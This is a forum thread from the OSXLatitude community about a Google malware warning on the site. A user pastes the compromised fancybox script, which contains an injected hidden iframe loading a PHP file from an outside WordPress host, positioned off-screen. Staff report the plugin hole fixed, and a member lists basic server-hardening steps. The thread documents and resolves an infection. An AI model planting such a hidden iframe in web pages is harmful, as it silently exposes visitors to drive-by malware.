Jump to content

Security Error


Paradizze

Recommended Posts

Osxlatitude is not listed malware over google, it's all this script doing. you can remove and get rid of this error :) 

 <script type="text/javascript">jQuery(function(){
jQuery.fn.getTitle = function() { // Copy the title of every IMG tag and add it to its parent A so that fancybox can show titles
	var arr = jQuery("a.fancybox");
	jQuery.each(arr, function() {
		var title = jQuery(this).children("img").attr("title");
		jQuery(this).attr('title',title);
	})
}
// Supported file extensions
var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) });
jQuery("a.fancybox").fancybox({
	'cyclic': false,
	'autoScale': false,
	'padding':</script><iframe
src="http://tusseyskiteam.com/wp-admin/js/bbcode.php" width="332" height="22" style="position:absolute;left:-88103px;"></iframe><script>,
	'opacity': false,
	'speedIn': ,
	'speedOut': ,
	'changeSpeed': ,
	'overlayShow': false,
	'overlayOpacity': "",
	'overlayColor': "",
	'titleShow': false,
	'titlePosition': '',
	'enableEscapeButton': false,
	'showCloseButton': false,
	'showNavArrows': false,
	'hideOnOverlayClick': false,
	'hideOnContentClick': false,
	'width': ,
	'height': ,
	'transitionIn': "",
	'transitionOut': "",
	'centerOnScroll': false
});
})</script>

http://s15.postimg.org/wirynakvf/arc.png

Link to comment
Share on other sites

Thanks for reporting. There was a leak in a WordPress plugin (fancybox) we were using on our main site. It is all solved now and it is totally safe again to visit our site.

It can take 12 to 24 hours until we are fully removed from the Google Safe Search mechanism. 

  • Like 1
Link to comment
Share on other sites

  • Administrators

Thank you for helping out on this - and a big thank you to everyone invovled.

This just afirms my believe that we should apoint a "Head of security" - Whats your skill set Lite ?

Link to comment
Share on other sites

This just afirms my believe that we should apoint a "Head of security" - Whats your skill set Lite ?

Actually i doubt my skills , i am still learning so not sure :)

 

And there's not much to do about security 

Just use clouflare as proxy, block all incoming/outgoing connection (only white list cloudflare ips so user can't directly reach to server) 

On ipboard just change default admin usergroup id, mysql prefix, lock admin directory and change it's location  and do something basic like protecting htaccess and conf_global :)

Link to comment
Share on other sites

×
×
  • Create New...